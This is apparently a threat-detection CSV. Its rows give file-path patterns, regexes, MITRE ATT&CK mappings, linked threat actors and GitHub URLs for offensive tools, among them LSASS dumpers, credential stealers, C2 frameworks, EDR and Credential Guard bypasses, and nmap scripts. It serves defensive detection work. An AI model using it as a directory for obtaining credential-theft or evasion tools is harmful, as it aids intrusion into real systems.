"*/mstscfox.dll*",".{0,1000}\/mstscfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","8961"
"*/mtrace.nse*",".{0,1000}\/mtrace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8962"
"*/mtth-bfft/adeleg/releases*",".{0,1000}\/mtth\-bfft\/adeleg\/releases.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","8963"
"*/MultiDump.exe*",".{0,1000}\/MultiDump\.exe.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","1","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","8964"
"*/MultiDump.exe*",".{0,1000}\/MultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","8965"
"*/MultiDump.git*",".{0,1000}\/MultiDump\.git.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","8966"
"*/MultiPotato.git*",".{0,1000}\/MultiPotato\.git.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","8967"
"*/multi-user.target.wants/tor.service*",".{0,1000}\/multi\-user\.target\.wants\/tor\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8968"
"*/murmur-version.nse*",".{0,1000}\/murmur\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8969"
"*/mushishi.h*",".{0,1000}\/mushishi\.h.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8970"
"*/MutationGate.git*",".{0,1000}\/MutationGate\.git.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","1","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","8971"
"*/mysql-audit.nse*",".{0,1000}\/mysql\-audit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8972"
"*/mysql-brute.nse*",".{0,1000}\/mysql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8973"
"*/mysql-databases.nse*",".{0,1000}\/mysql\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8974"
"*/mysql-dump-hashes.nse*",".{0,1000}\/mysql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8975"
"*/mysql-empty-password.nse*",".{0,1000}\/mysql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8976"
"*/mysql-enum.nse*",".{0,1000}\/mysql\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8977"
"*/mysql-info.nse*",".{0,1000}\/mysql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8978"
"*/mysql-query.nse*",".{0,1000}\/mysql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8979"
"*/mysql-users.nse*",".{0,1000}\/mysql\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8980"
"*/mysql-variables.nse*",".{0,1000}\/mysql\-variables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8981"
"*/mysql-vuln-cve2012-2122.nse*",".{0,1000}\/mysql\-vuln\-cve2012\-2122\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8982"
"*/Mystikal.git*",".{0,1000}\/Mystikal\.git.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","8983"
"*/mystikal.py*",".{0,1000}\/mystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","8984"
"*/Mythic/mythic*",".{0,1000}\/Mythic\/mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8985"
"*/Mythic_CLI*",".{0,1000}\/Mythic_CLI.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8986"
"*/MythicAgents/*",".{0,1000}\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8987"
"*/MythicAgents/*",".{0,1000}\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8988"
"*/MythicC2Profiles/*",".{0,1000}\/MythicC2Profiles\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8989"
"*/mythic-cli*",".{0,1000}\/mythic\-cli.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8990"
"*/MythicConfig.cs*",".{0,1000}\/MythicConfig\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8991"
"*/mythic-react-docker*",".{0,1000}\/mythic\-react\-docker.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8992"
"*/mzet-/les-res*",".{0,1000}\/mzet\-\/les\-res.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8995"
"*/n0kovo_subdomains_huge.txt*",".{0,1000}\/n0kovo_subdomains_huge\.txt.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","8996"
"*/n1nj4sec/pupy*",".{0,1000}\/n1nj4sec\/pupy.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8997"
"*/NachoVPN.git*",".{0,1000}\/NachoVPN\.git.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","8998"
"*/nachovpn:release*",".{0,1000}\/nachovpn\:release.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","8999"
"*/nachovpn-1.0.0-py3-none-any.whl*",".{0,1000}\/nachovpn\-1\.0\.0\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","9000"
"*/NamedPipeMaster.git*",".{0,1000}\/NamedPipeMaster\.git.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","9001"
"*/NamedPipeMaster/tarball/*",".{0,1000}\/NamedPipeMaster\/tarball\/.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","9002"
"*/NamedPipeMaster/zipball/*",".{0,1000}\/NamedPipeMaster\/zipball\/.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","9003"
"*/NamedPipeMasterBase/*",".{0,1000}\/NamedPipeMasterBase\/.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","9004"
"*/NamelessC2.git*",".{0,1000}\/NamelessC2\.git.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","1","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","9005"
"*/NamelessLog.txt*",".{0,1000}\/NamelessLog\.txt.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#linux","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","9006"
"*/nanodump*",".{0,1000}\/nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","9008"
"*/nanodump.*",".{0,1000}\/nanodump\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","9009"
"*/nanodump.py*",".{0,1000}\/nanodump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9010"
"*/nanorobeus.git*",".{0,1000}\/nanorobeus\.git.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","9011"
"*/nanorubeus/*",".{0,1000}\/nanorubeus\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","9012"
"*/Native/SigFlip/*",".{0,1000}\/Native\/SigFlip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","9013"
"*/NativeBypassCredGuard.git*",".{0,1000}\/NativeBypassCredGuard\.git.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","1","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","9014"
"*/NativeDump.exe*",".{0,1000}\/NativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","9015"
"*/NativeDump.git*",".{0,1000}\/NativeDump\.git.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","9016"
"*/nat-pmp-info.nse*",".{0,1000}\/nat\-pmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9017"
